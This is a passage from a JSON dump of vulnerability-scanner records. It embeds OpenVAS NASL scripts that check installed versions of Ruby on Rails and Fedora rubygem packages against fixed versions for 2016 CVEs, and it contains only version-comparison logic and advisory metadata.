later.\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.1)\" )\n{\n if( version_is_less( version: version, test_version:\"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.5.2\" ) )\n {\n fix = \"4.2.5.2\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T21:53:54", "description": "This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2097"], 
"modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809354", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809354", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809354\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2097\");\n script_bugtraq_id(83726);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 20:09:25 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host 
is running Ruby on Rails and is\n prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of\n crafted requests to action view, one of the components of action pack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to read arbitrary files by leveraging an application's unrestricted\n use of the render method.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! 
infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-21T21:55:40", "description": "This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2097"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809355", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809355", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809355\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2097\");\n script_bugtraq_id(83726);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 17:09:25 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of\n crafted requests to action view, one of the components of action pack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to read arbitrary files by leveraging an application's unrestricted\n use of the render method.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version:\"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-97002", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807435", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807435", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview 
FEDORA-2016-97002\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807435\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:24:53 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2016-0752\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-97002\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-97002\");\n 
script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178069.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.3~3.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activejob FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activejob FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in 
the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872008\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:24:00 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activejob FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activejob'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activejob on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R67FRLEDPZRRVMJS3A5LA6YIM5UQO4GY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security 
Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activejob\", rpm:\"rubygem-activejob~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activesupport FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871965", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871965", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activesupport FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871965\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:21:49 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activesupport FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activesupport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activesupport on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MRQYAVBWV4UNQ5XC3LB5L44OYTI3JZ3W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activesupport\", rpm:\"rubygem-activesupport~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activemodel FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872038", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872038", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activemodel FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872038\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:19 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activemodel FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activemodel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activemodel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JNY6ZLXQZ4GJM4L5Z2JD42S4WMYF75U5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activemodel\", rpm:\"rubygem-activemodel~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activerecord FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872047", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872047", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activerecord FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872047\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:34 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activerecord FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activerecord'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activerecord on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5VQDB7AQ3WT2TSLDMYPYKXIMBJ7KYSJ6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activerecord\", rpm:\"rubygem-activerecord~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actioncable FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872011", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actioncable FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872011\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:24:06 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actioncable FEDORA-2016-5760339e76\");\n 